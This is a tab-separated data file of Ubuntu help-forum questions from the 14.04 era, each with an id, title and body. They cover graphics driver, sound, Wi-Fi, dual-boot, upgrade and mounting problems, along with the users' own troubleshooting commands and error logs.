451265	need help with ati fglrx and xorg	i 'm quite new to ubuntu ... right now i 'm using 14.04 trusty tahr , and i love it ... except for one thing ... the display driver . i want the best performance i can get from my video card ( ati radeon hd 3600 ) . i know , i know , it 's not a powerful card , but with the gallium driver it seems like i wo n't be able to play any games . and do n't get me wrong , i do n't want to play aaa games , i was hoping to play team fortress ii and that kind of stuff ... now to get to the point . i 've downloaded the latest display driver ( 13.1 ) for my card from amd site . i 've tried running the .run file in terminal , and when i chose to install the driver , a message popped out saying that one or more packages required for installation have not been found . then i did the following : sudo sh ( drivername ) .run -- buildpkg ubuntu/trusty after that , i installed the .deb package that was generated ( do n't remember the command ) . before the reboot , i entered aticonfig -- initial after reboot , i was not logged in my account , instead i was at the login screen . entering my password would bring me back to the login screen , not even guest account works . so i had to remove the driver by pressing ctrl+alt+f1 , and then everything worked . sudo apt-get remove fglrx so here are some commands i tried before removing the driver ( none of them worked ) sudo mv ~/.xauthority ~/.xauthority.backup sudo service lightdm restart sudo chown -r $ user : $ user $ home cd /tmp sudo rm -rf * ls -lah chown username : username .xauthority sudo chmod a+wt /tmp dpkg-reconfigure lightdm sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.backup ls -l ~/.xauthority when i typed in ls -lah , some packages got listed , and 3 of them ( all have fglrx in their names ) were written in red instead of white . also , i 'm using 64 bit ubuntu . so if you have any other commands i can try , please let me know .
451267	what is the difference between sound drivers in ubuntu 10 and newer versions ?	i am trying to jump from xp and would like to use ubuntu as it has everything i require . the problem i am having is that i can not get the sound to work . i have installed older versions 10.10 and the sound works perfectly , but if i install a newer version the sound does n't work . ubuntu 14.04 is recognising the card ( realtek alc260 ) and installing the drivers but in the sound app i only get digital audio and headphones options listed ( and the headphones option is constantly flashing ) . there is no analog option ( there was when i installed 10.10 ) i have tried all the mods i can find to /etc/modprobe.d/alsa-base.conf e.g . snd-hda-intel model=**** but i only get a flashing headphone option and no analog option to select as output . any ideas would be greatly appreciated !
451271	splash screen messed up through nvidia driver	when i installed ubuntu 13.10 i had some issues with the opensource graphic driver . my desktop was messed up and afterwards i found out that the driver was not able to allocate enough memory . therefore i switched to the official nvidia driver . everthing worked fine and stable except the splash screen ( plymouth ) . i read the solutions available and then executed the fixplymouth script with the proper resolution . unfortunately it does n't work . now i have upgraded to the new lts version , 14.04 , and this issues is still a pain . when i start my computer i see purple screen for a second followed by a terminal with a big blinking cursor in the left upper corner . then the cursor gets smaller and i assume because the graphics driver are loaded and resolution has changed . now the exciting part begins . sometimes the screen remains black until the login screen appears ( with some graphical bugs , but never mind ) . but most of the times i get a vertical striped thing similar to a splash screen in black and another random colour ( red , blue , yellow , i saw everything ) . here some images : i use ubuntu 14.04 , the nvidia 331.38 driver and my laptop is an acer travelmate 5742g : intel core i5-460m nvidia geforce gt 420m 15.6째 display with 1366x768 does anybody know a solution for that ?
451283	where can i find the gpu name and the driver it is located at ?	i have ubuntu 13.10 . i am going to start bitcoin mining and got a program called bfgminer . the problem is that bfgminer do n't reckognize any driver so i pressed m and + to add a new driver and it tells me to give it the `` prefix by a driver name and colon to only probe a specific driver . for example : erupter : /dev/ttyusb39 '' can someone help me find the driver name and all the information i need . thanks in advance !
451284	can not find blueman icon in system tray	after i upgrade to 14.04 lts , i ca n't find blueman icon in my system tray . the blueman-applet is up well and i can use blueman to manage my devices . any idea on this ?
451286	how do i fix ubuntu graphical errors and unable to see current partitions ?	ok , my main problem , is that i ca n't install ubuntu on my machine . i have opened the installer and it seems to think my hard drive is blank , but it actually has windows 7 installed on a 750+ gigabyte partition , and i have left around 250 gigabytes for a linux distro . it just ca n't see the partitions , and can not even detect my windows 7 install . also , i have a massive graphical error when booting to the live desktop on my dvd , it glitches the screen up completely , and the screen then starts flashing , and then the display completely turns off . can anyone help ?
451287	trying to install ubuntu on i686 cpu	i tried to install ubuntu , but received an error message that i can not install as my computer has an i686 cpu . do i need a different version of ubuntu ?
451290	how to run chromium as a root user	how do i run chrome as a root user in ubunut 12.04 ? ?
451292	accessing files	i started using ubuntu ( 12.04 ) a month or so back , i 've not done much with it so i have only a few important files ( particularly my thunderbird profile ) . yesterday i tried to upgrade to 14.04 ; the install seemed to go ok but after the restart my screen shows garbage ( i suspect the video drivers were replaced by unsuitable ones ) . because the screen is garbage i can not access the system and hence not the files either . i need to get my thunderbird profile back ( i do n't really care about anything else ) . i tried to reinstall 12.04 but both the installation options wipe all my files . i abandoned that effort . i have used the `` try ubuntu '' option from the live cd and ( following a hint i found ) i tried using gksu nautilus i could see the .thunderbird folder but my attempts to copy the profile failed with the message `` error copying file : permission denied '' . i have tried changing the permissions on both the .thunderbird and destination folder ( on a usb memory stick ) with no success . i would really like to get that profile back ( i have a sentimental attachment to some of my emails ! ) . can anyone help ? it 's probably obvious that i do n't really know what i 'm doing in ubuntu so - please be gentle ( in particular , i need detailed instructions if the use of the terminal is required ) thanks in advance
451293	my steam wo n't start !	running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140420185934_1.dmp /home/chidatn/.local/share/steam/steam.sh : line 755 : 14713 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' bmv : can not stat ‘/home/chidatn/.steam/registry.vdf’ : no such file or directory installing bootstrap /home/chidatn/.local/share/steam/bootstrap.tar.xz reset complete ! restarting steam by request ... running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/chidatn/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140420185936_1.dmp /home/chidatn/.local/share/steam/steam.sh : line 755 : 14839 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-95884ef3-24c7-400d-9c3a-ef4af2140420 finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-fd864c85-e5af-4d9f-8653-f766c2140420 please help me !
451294	how do i change the xubuntu start menu color and style ?	my xubuntu menu is very very simple like this : i 've noticed that new xfce menu is better than this like this : how can i convert ? and ... .if i ca n't do it then my new question is here : i 'm enjoying xubuntu ( xfce ) lightness and low-resource usage but i want to customize it . so my question is how can i `` change start-menu colour '' to a dark colour ?
451295	autostart chromium in lubuntu 12.04	i 'm new lubuntu and i want to start chromium at boot . i 've no idea where to start . could someone point me in the right direction .
451301	partitioning 2tb drive with windows 8 on it	i have a 2 tb hdd and i wanted to partition it about 50 gb for ubuntu and the rest for windows 8 . but i ca n't seem to be able to move the slider any less than 100 gb for ubuntu ? ps i have already tried to do an advanced partition but i do n't want to mess up .
451306	in software center , some softwares are not found	i have installed a fresh copy of ubuntu 14.04 . then i started to install some new softwares . but when i tried to see the description of some softwares , the following type of message was displayed . not found there isn’t a software package called “steam” in your current software sources . install button was also not available . and the softwares which i am able to install shows the following message in review section . no network connection . connect to the internet to see more but i am connected to the internet and i have installed some softwares from software cente already .
451308	when upgrading non official repository ( ppa ) will be lost ?	actually i want to upgrade to the newly released ubuntu 14.04 from a saucy 13.10 version . regarding that i never run into an upgrade process from a *nix version to an onward one , i want your kind rectification on what files will be changed in this upgrade process : does non official repository ( ppa ) will be lost ? if some sources modified , will they be backed up to original state ?
451314	webcam install not listed by lsusb	hallo i have a new acer v5-573g and ubuntu 12.04 i am trying to install the webcam but if i use the command : sudo lsusb i get these results : bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub what should i do ? i dont know how to identify my webcam .
451315	how do i install ubuntu 14.04 on samsung n10 netbook ?	i am having trouble installing ubuntu 14.04 on a samsung n10 netbook running windows xp . i have followed the ubuntu instructions and created a bootable usb stick but the n10 manual says it is set to boot from an external cd drive . if i try with the usb stick , it ignores it and boots to windows . if i press f12 during startup for a short time , it boots to windows ; if i hold f12 down i get an error message . i do n't have an external cd drive . is there any other way i can install ubuntu on the computer ?
451319	permanently disabling screen blinking dell vostro 3350	i 've an old issue described here , to keep it short , after few seconds to one minute after boot screen starts flickering - windows and other elements rapidly turn white and go normal again . problem gets solved by typing sudo xinput set-prop 8 `` device enabled '' 0 into the terminal , and after that everything is fine until next boot . my question is - is it possible to permanently disable this `` ghost '' button ? pasting sudo xinput set-prop 8 `` device enabled '' 0 into rc.local does n't work , i think it 's due to this flickering turning on some time after boot . i 'm using 14.04 lts , though 13.10 had the same problem . thanks !
451323	which media player to sync with my lg nexus 5 ?	i have an lg nexus 5 phone running andriod 4.4.2 and a laptop with ubuntu 14.04 lts installed . when attached via usb2 or usb3 i can mount the file system on the phone without issue and can manually transfer files but this is not the rich functionality that i 'm after . i have tried using banshee 2.6.2 to sync music and playlists but as soon as i attach my phone banshee hangs and tells me : `` oops ! something went wrong . unhandled error message : no such interface 'org.gtk.vfs.mount ' on object at path /org/gtk/vfs/mount/1 `` i do like the banshee interface and functionality but i ca n't see how i can carry on using it if i 'm unable to use it to manage my music on my phone . any advice on solving the issue or recommend an alternative software package that will offer the same functions would be appreciated ?
451324	how to direct dhcp requests based on ip	i have a home server that i want to make multicast a music stream to my network . i have the server connected to my main network router via wifi , and i have a switch connected to the server by wire where i 've plugged in some clients . these clients are to be able to play the music stream from the multicast source . when i configure the network in this respect , i find the wireless network crumbles . i think this is because the router gets loaded , because the same thing happens when i connect the server playing the multicast stream to the router by wire . so , instead of crowding my main network , i would like to create a separate , wired network with the server that keeps the multicasting separate from the main wireless network . however , the added complication is that the server needs an internet connection to be able to receive the music stream which it will then multicast . i 've managed to configure a dhcp server on the home server , and have connected clients get assigned ip addresses properly , but it then blocks access to the web . in other words , any requests that would need to go via the home server 's wireless link do n't get sent there . is there a way to selectively decide which dhcp server to use ( either the home server or the router ) ? or can anyone think of a better way of doing this altogether ? i 've got isc-dhcp-server installed and running . here is /etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback # the network for multicasting auto eth0 iface eth0 inet static address 10.0.0.1 netmask 255.255.255.0 gateway 10.0.0.1 broadcast 10.0.0.255 # the web connection auto wlan0 iface wlan0 inet dhcp wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf and /etc/default/isc-dhcp-server : interfaces= '' eth0 '' and /etc/dhcp/dhcpd.conf : default-lease-time 600 ; max-lease-time 7200 ; option subnet-mask 255.255.255.0 ; option broadcast-address 10.0.0.255 ; option routers 10.0.0.254 ; option domain-name-servers 10.0.0.1 , 10.0.0.2 ; option domain-name `` musicnet '' ; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.10 10.0.0.100 ; } thanks for reading !
451326	how to ensure that wireless logitech keyboard is encrypted ?	just as the title says , i 'm using a wireless logitech keyboard , and i want to ensure that my keystrokes are in fact encrypted . on windows , i could do that very easily by using the logitech setpoint software , pressing a key sequence ( ctrl+alt+f12 ) , pressing the connect button on the keyboard , and typing in an encryption key that 's displayed on the monitor . set and done ! how do i do the same on ubuntu linux ? here is a screentorial on windows :
451328	i cant update 13.10 to 14.04	i try to update my os today 13.10 to 14.04 and i have this error third party sources disabled some listings have disabled third file souces.list . you can activate after the upgrade tool with the 'software-properties ' or with your package manager . απενεργοποιήθηκαν πηγές τρίτων μερικές καταχωρίσεις τρίτων έχουν απενεργοποιηθεί στο αρχείο souces.list . μπορείτε να τις ενεργοποιήσετε μετά την αναβάθμιση με το εργαλείο 'software-properties ' ή με τον διαχειριστή πακέτων σας . and we could not calculate the upgrade a non-solvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a demo version of ubuntu * the use of the current trial version of ubuntu * unofficial software packages not provided by ubuntu . if you apply any of that , then please report this error by using a terminal command 'ubuntu-bug ubuntu-release-upgrader-core ' . αδυναμία υπολογισμού της αναβάθμισης ένα μη επιλύσιμο πρόβλημα συνέβη κατά τον υπολογισμό της αναβάθμισης . αυτό μπορεί να προκλήθηκε από : * την αναβάθμιση σε μια δοκιμαστική έκδοση του ubuntu * τη χρήση της τρέχουσας δοκιμαστικής έκδοσης του ubuntu * ανεπίσημα πακέτα λογισμικού που δεν παρέχονται από το ubuntu . αν δεν ισχύει τίποτα από αυτά , τότε παρακαλούμε αναφέρετε αυτό το σφάλμα χρησιμοποιώντας σε ένα τερματικό την εντολή 'ubuntu-bug ubuntu-release-upgrader-core ' . and how i can install ubuntu to my phone ?
451329	change user profile photo in ubuntu 14.04	today , i installed the ubuntu 14.04 lts 64bit . and i open the cheese webcam booth , the webcam works fine . i want to change the user photo in profile , webcam not works . i also try `` browse for more picture '' and select a photo . but its hangs ... note : dafault image selection works fine
451335	ca n't switch anymore from intel to nvidia gpu	[ ubuntu 14.04 64bit ] after switching between intel / nvidia graphics and the different nvidia drivers i am now suddenly stuck with the intel gpu . it used to be no problem at all switching between the two - i can not say for sure what is suddenly causing the issue . i think the last thing i did was switching to the `` x.org x server '' driver - then something broke . the switching was part of me trying to troubleshoot issues with setting up a secondary screen . every time i try to switch to nvidia i get this very expressive error message and then it switches back to intel : / i could use some assistance with troubleshooting or suggestions on what to try . so far i ( un/re ) installed the various packages `` nvidia-settings '' / `` nvidia-current '' / `` nvidia-current-updates '' / `` nvidia-331 '' / `` nvidia-331-updates '' . to no avail . > lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107glm [ quadro k2000m ] ( rev a1 ) /etc/apt/sources.list : may be found at pastebin.com regarding suggestion by qasim : raffael @ raffael-gt60~ > sudo prime-select nvidia [ sudo ] password for raffael : error : alternatives are not set up properly error : nvidia mode ca n't be enabled raffael @ raffael-gt60~ > sudo prime-select intel error : alternatives are not set up properly error : intel mode ca n't be enabled regarding 2nd suggestion by qasim : sudo apt-get purge nvidia* [ reboot ] sudo apt-get install nvidia-319-updates nvidia-settings-319-updates nvidia-prime [ reboot ] [ tried to switch to nvidia ] weird thing is - this actually worked the first time ! ? then i switched back to intel - log off/on - switched back to nvidia - log off/on - > system crashed - error as described above . regarding suggestion by louis matthijssen : raffael @ raffael-gt60 : ~ $ sudo update-alternatives -- set /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf /usr/lib/nvidia-331-updates-prime/ld.so.conf update-alternatives : error : alternative name ( /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ) must not contain '/ ' and spaces raffael @ raffael-gt60 : ~ $ ls -la /usr/lib/nvidia-331-updates-prime total 44 drwxr-xr-x 2 root root 4096 mai 2 22:45 . drwxr-xr-x 196 root root 32768 mai 3 10:57 .. -rw-r -- r -- 1 root root 0 apr 4 11:50 alt_ld.so.conf -rw-r -- r -- 1 root root 60 apr 4 11:50 ld.so.conf repeated algo twice - did n't work again : / now it seems to work : raffael @ raffael-gt60 : ~ $ sudo update-alternatives -- set x86_64-linux-gnu_gl_conf /usr/lib/nvidia-331-updates-prime/ld.so.conf update-alternatives : using /usr/lib/nvidia-331-updates-prime/ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in manual mode raffael @ raffael-gt60 : ~ $ sudo update-alternatives -- set i386-linux-gnu_gl_conf /usr/lib/nvidia-331-updates-prime/alt_ld.so.conf update-alternatives : using /usr/lib/nvidia-331-updates-prime/alt_ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in manual mode afterwards i could switch to nvidia - but was n't offered the extended `` nvidia x server settings '' - will reboot now and see what happens . follow up : it switched back to intel after reboot and can not switch to nvidia as usual . to me it seems that your method , louis , tricks the os into believing it uses nvidia while this is actually not the case .
451336	no sound on a samsung rc512 since upgrade to 14.04	after the upgrade i can only have sound visually . it seems to work but no sound . in the beginning i installed the pulseaudio volume control and i was able to make the sound work , but after and update its interface changed and the options in it changed . please help : - ) .
451337	ubuntu 14.04 wi-fi disconnect	after installing ubuntu 14.04 lts 64bit , my wifi after time off , the dmesg tells me the following : wlan0 : deauthenticated from 00:40:10:10:00:03 ( reason : 7 ) [ 1201.967245 ] cfg80211 : calling crda to update world regulatory domain [ 1201.969781 ] cfg80211 : world regulatory domain updated : [ 1201.969784 ] cfg80211 : dfs master region : unset [ 1201.969786 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1201.969788 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi mbm 2000 ) [ 1201.969789 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi mbm 2000 ) [ 1201.969791 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi mbm 2000 ) [ 1201.969792 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi mbm 2000 ) [ 1201.969793 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi mbm 2000 ) my network card is this : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec : 8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec : 9181 ] flags : bus master , fast devsel , latency 0 , irq 16 i / o ports at 2000 [ size = 256 ] memory at f0500000 ( 64 -bit , non - prefetchable ) [ size = 16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count = 1/1 maskable - 64bit + capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 01-91-81- fe- ff -4c - e0 -00 kernel driver in use : rtl8192ce i must restart the network-manager to see the wireless network again .
451340	skype-wrapper can not be installed in trusty	i have a fresh , brand new installation of trusty . unfortunately i am unable to install skype-wrapper : some packages could not be installed . this may mean that you have equested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype-wrapper : depends : python-skype ( > = 1.0.31 ) but it is not installable what shall i do ? i can not find python-skype package in the repository . thanks ! edit : this is really not a duplicate question . my problem does not concern any previous version of ubuntu and therefore provided solution from other thread does not apply . my main problem is that i can not install skype-wrapper because apparently python-skype is not present . can you point me to the correct location where i can download this package ( as it is not in any existing ppa ) .
451348	disable client side decorations in nautilus ( gnome 3.10 )	if i open a nautilus window via terminal using sudo or gksudo command , client side decorations seem to be disabled and i get the “old style” windows decorations : can someone retrace this behavior ? since i happen to dislike the new cds , i’d really like to get title bars everytime i open nautilus . i use ubuntu 14.04 and gnome 3.10 installed from the official repo .
451350	how should i control the brightness on my ubuntu 14.04 system ?	brightness control button is changing brightness value in file /sys/class/backlight/acpi_video0/brightness , but screen brightness is not changing .
451353	any downloader for files on filesmonster.com ?	i was recommended to jdownloader a while ago to be used on ubuntu 12.04 . however i ca n't use it to work with http : //filesmonster.com . does anyone know if it does work or any other software may work ? thanks !
451355	ubuntu alongside windows 7 - no option	i ca n't install ubuntu 14.04 lts alongside windows 7 professional 64bit , because i do n't have the installation option . i set up the partitions as shown in this picture : help me please this is how ubuntu sees the hdd :
451357	ubuntu 14.04 lts trusty tahr 64-bit hashes can not be positively verified against the ubuntu public key	i downloaded ubuntu 14.04 lts trusty tahr 64-bit iso from here and all the hashes from here . i checked downloaded iso against the provided hashes ( md5sums , sha1sums , sha256sums ) . everything was correct . any integrity issues were revealed . unfortunately , i can not positively verify given hashes against the ubuntu public key . i had gpg installed , so i imported fbb75451 key from keyserver.ubuntu.com . $ gpg -- keyserver hkp : //keyserver.ubuntu.com -- recv-keys 0xfbb75451 gpg : requesting key fbb75451 from hkp server keyserver.ubuntu.com gpg : key fbb75451 : public key `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' imported gpg : 3 marginal ( s ) needed , 1 complete ( s ) needed , pgp trust model gpg : depth : 0 valid : 2 signed : 12 trust : 0- , 0q , 0n , 0m , 0f , 2u gpg : depth : 1 valid : 12 signed : 8 trust : 0- , 0q , 0n , 6m , 6f , 0u gpg : depth : 2 valid : 4 signed : 4 trust : 1- , 0q , 0n , 0m , 3f , 0u gpg : depth : 3 valid : 1 signed : 0 trust : 0- , 0q , 0n , 0m , 1f , 0u gpg : next trustdb check due at 2008-04-14 gpg : total number processed : 1 gpg : imported : 1 however , when the command $ gpg -- verify md5sums.gpg md5sums is put into terminal , the result is as follows : gpg : signature made sat 19 apr 2014 12:38:11 am cest using dsa key id fbb75451 gpg : bad signature from `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' could you explain me why gpg previews bad signature ? what went wrong ? thank you for your responses . i downloaded the checksums once again an hour ago and everything was verified positively . what was the cause of my problem , i do n't know . : )
451360	purchasing a computer which ubuntu can install on	i am considering purchasing a laptop and i would like to buy one which ubuntu can be installed on . of course , it would be nice if all of the hardware works ( i.e. , webcam , etc . ) but if they do n't , i 'm not too worried about it . what i am worried about is a computer which ca n't even accept ubuntu ( i.e. , grub wo n't correctly install ) . i heard that there was a period where computers were being manufactured which contained windows and nothing else could be installed on top of . i 'd like to dual boot it ( i.e. , with windows ) , but if that is n't possible , that is fine . anyway , does anyone know what is this limitation called so that i can search for it with google ? or does anyone know off-hand if the current laptops ( i.e. , running windows 8.1 ) can accept grub ? i vaguely recall that this was a problem with windows 7-era computers , but i am not too sure .
451361	how do i add an icon to an executable file	i have several utility programs that i can run only by clicking on their `` generic '' executable file . how can i assign an icon to each of them for it to show in the launcher ? i am using ubuntu 14.04 lts . thanks .
451364	how to enable exfat in ubuntu 14.04	i just installed ubuntu 14.04 and i ca n't mount my exfat hdd . i get the following error : unable to access âseagatehddâ error mounting /dev/sdb1 at /media/me/seagatehdd : command-line `mount -t `` exfat '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , namecase=0 , errors=remount-ro , umask=0077 '' `` /dev/sdb1 '' `` /media/me/seagatehdd '' ' exited with non-zero exit status 1 : stdout : `fuse exfat 1.0.1 ' stderr : `error : `operating systems ' has invalid checksum ( 0x281c ! = 0x2450 ) . ' i installed exfat-utils and exfat-fuse using apt-get but no luck . i also tried the repository ppa : relan/exfat but i got : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : fuse-exfat : depends : fuse-utils ( > = 2.7 ) but it is not installable e : unable to correct problems , you have held broken packages . can anybody give me a hint ? all my backed up data is on that hdd . thanks ! edit : the output of $ sudo apt-cache policy fuse-exfat is : fuse-exfat : installed : ( none ) candidate : 1.0.1-1 version table : 1.0.1-1 0 500 http : //ppa.launchpad.net/relan/exfat/ubuntu/ trusty/main amd64 packages tried it on a linux mint and had the same problem . also tried mounting it on a mac and it worked perfectly so the data is not corrupted . edit2 : it appears it was a problem with my hdd which apparently i unplugged from the usb without unmonting and it had a checksum error . what i did was i plugged it on my mac and the mac automatically did a fsck_exfat which fixed the problem and i could load it on ubuntu as well . i think a similar thing could be achieved on ubuntu as well , but i do n't know with which tools .
451365	browser display issue - text only	i have installed 14.04 lts , and the browsers ( mozilla , chromium , ubuntu browser ) displays text-only pages , with no alignment . all texts are spread out and looks abnormal . help me .
451372	not able to install ubuntu 14.04 using wubi	i have downloaded ubuntu 14.04 32 bit iso and made bootable usb stick of it..from there i took wubu and put it in on the same folder in which i have put iso file.when i tried installing ubuntu using wubi it shows following error message ... .. '' can not download the metalink and therefore iso '' . and tried same thing with my internet on it is downloading ubuntu14.04amd64 file from server but my system has intel based processor .
451378	phppgadmin not working in ubuntu 14.04	after a fresh install of ubuntu 14.04 , i 've installed postgresql and phppgadmin from the ubuntu repos . i am using the apache2 webserver . php is working fine in the webserver , as is phpmyadmin , but phppgadmin is not working . when i try to access it at localhost/phppgadmin , i get a 404 message . i 've tried creating a symlink in /var/www to the phppgadmin content , but that does n't seem to work . how do i fix this ? edit : note that i am using a local proxy server ( squid ) through which i funnel all my online traffic . while this may be part of the problem , i would be surprised if it was , because i am still on the same machine as phppgadmin and the requests logged in the apache access log indicate that incoming requests for the page are coming from the local machine ( which is allowed in the policies for phppgadmin , if i understand things correctly ) .
451383	how to open the gnome terminal ?	i just installed ubuntu 13.10 and would like to learn how bash command line works , but unable to access it . it seems that i can use super-t to access monitor , but my keyboard does not have super key . i use stand windows keyboard which machine was in windows . i would like to learn how to access bash command from ubuntu .
451386	how to achieve multi touch gestures in ubuntu 14.04	is it possible to get multitouch gestures in ubuntu 14.04 like macbook ? if possible how to activate or install multi touch gestures ? my laptop is lenovo z580.it has syanptics touchpad which supports multi touch of 4 fingers as of my knowledge . i tried touchegg but no use .
451390	authentication required by wifi network ubuntu 14.04	whenever i connect to my wifi network , this annoying 'authentication required by wifi nework ' window pops up , with my wifi password in it . all i have to do is to press the connect button . still i think this is an incorrect behavior , and i 'd like to know if there is a fix . please note that i have `` allow all users to connect '' checked and `` connect automatically '' checked too . my network adapter is a broadcom one , and is using a proprietary driver , which i enabled from additional drivers . the system is a fresh install .
451393	crippled unity control center	i installed ubuntu 14.04 on my hp laptop , and - in order to make my skype , musescore , ardour etc . working properly i removed pulse audio ( alsa server is doing all the sound stuff just fine ) . the problem is , that the unity control center package is bound with pulseaudio in such way , that after the uninstall process i lost nearly two thirds of the `` system settings '' features . futhermore , i tried to use a replacement for the unity control center - the unity tweak tool and it does n't want to work without pulse audio either . please , could you tell me how to fix this problem ?
451395	what is the differences between mysql-client and mysql-client-core ?	i wonder what is the differences between mysql-client and mysql-client-core ? also there are mysql-server and mysql-server-core .
451398	after updating an older computer from v12 to v14 it is very slow	everything is slowed way down - 5 to 10 seconds just to open something from the task bar . then it slowly fades in . totally destroyed my confidence in ubuntu as a viable alternative to winxp . this has been an ongoing thing with linux actually being a operating system for normal people and not just for geeks . until a normal non geek can actually just install a working version without having to resort to the command line to actually get stuff to work . it will not be used by anyone other than the geeks that like to play around with the os . i wanted to give this system to a normal person ( non geek ) but now - i will just have spend another couple of hours trying to reinstall the older v12 or to go back to windows because they do n't have the technical know how to jump through the hoops to get ubuntu to actually work . they do n't want to 'play ' with the os , they just want to run fairly standard programs .
451399	ubuntu dual boot does not boot windows anymore	problem : i ca n't boot both ubuntu and windows . description : i just installed ubuntu 14.04 lts 64bit and windows 7 64bit on my lenovo y500 with uefi legacy support mode enabled and did update-grub ( gnu grub 0.97 ) . on sda there is installed grub and windows mbr . on sdb reside the installations of windows 7 and ubuntu i tried boot-repair restore mbr : restores windows boot but i ca n't boot to grub . i tried boot-repair recommended : ca n't boot windows 7 from grub menu entry for windows 7 . it just shows a black screen without any movement directly afterchoosing the entry . the fan starts to run high . can only boot ubuntu from grub . question : how can i make grub2 boot windows properly ? this setup worked once with ubuntu 13.04 .
451401	fan control on dell l521x	i have a dell inspiron 15 l521x ( january 2013 ) , and i have just installed ubuntu 14.04 stock . everything is kind of ok but it seems that the fans never kick in . so even when editing some stuff on gedit the laptop gets quite hot , nevertheless under ms windows the fans keep it cold while i type ms word , i have tried to use i8k but it says : modprobe : error : could not insert 'i8k ' : no such device some say i should force it , and when i do , i get strange readings from i8kctl , and even when using it to start the fan and set it to high speed , it does n't seem to work . so i 'm about to leave ubuntu cos my laptop might fry , i have had 2 lock ups cos temperature so far . any help i 'd be much appreciated .
451404	am i running 32-bit or 64-bit ?	i know this question has been asked a number of times , but my system seems to contradict itselfâś following the answer to this question , i have run the following : $ uname -a linux manaha 3.13.7-x86_64-linode38 # 1 smp tue mar 25 12:59:48 edt 2014 x86_64 x86_64 x86_64 gnu/linux $ file /sbin/init /sbin/init : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0xc0d86a25a7abb14cad4a65a1f7d03605bcbd41f6 , stripped so , while uname seems to suggest 64-bit , /sbin/init suggests 32-bit . what 's happening here ?
451405	empty nvidia-settings after install v. 331.67 driver on ubuntu 14.04 ?	i 've followed this tutorial ( with the following adjustments below ) to install v. 331.67 nvidia driver . but get nvidia-settings ( nvidia x server settings ) empty ... then , before restart the pc , i make a xorg.conf in the nvidia-settings . the driver make unity do n't start right . so i installed nvidia-331-updates via apt-get and restarted the pc again . after that , the unity works fine . but the nvidia-settings gets almost empty ... can someone help ! ?
451406	where did /etc/init.d/dovecot go in 14.04 ?	i 'm trying to configure dovecot+postfix on a new 14.04 release image in ec2 . i installed mail-stack-delivery without installing postfix or dovecot separately . now i ca n't figure out how to restart dovecot because /etc/init.d/dovecot seems missing . or am i missing something ? thanks .
451407	remap tab key to another key	i am using ubuntu 12.04 , my tab key is not working and i want to use auto complete function . is there any way i could assign other key for the same function in ubuntu manually ? i looked into the keyboard layout but i could n't able to figure it out , is it possible ?
451410	kubuntu 14.04 iec958 turns off at login	i 've just upgraded to kubuntu 14.04 from kubuntu 12.04 on my laptop ( packard bell easynote tj65 ) . on kubuntu 12.04 the iec958 output ( digital audio optical/toslink spidif output ) was always on as well as the laptop speakers . with optical cable unplugged the speakers worked , with optical cable plugged the optical oputput worked and with earphones plugged they worked . on kubuntu 14.04 the optical output is disabled by default , i can enable it form alsamixer , but is i plug and unplug the cable or if i log out and log in it shuts down . is there a way to have it always on in parallel with the speakers ? thanks
451414	upgrade from 12.04 lts to 14.04 lts	i want to upgrade my ( german ) desktop from 12.04 lts to 14.04 lts but get no chance . my software updater says my 12.04 is actual and that 's it .
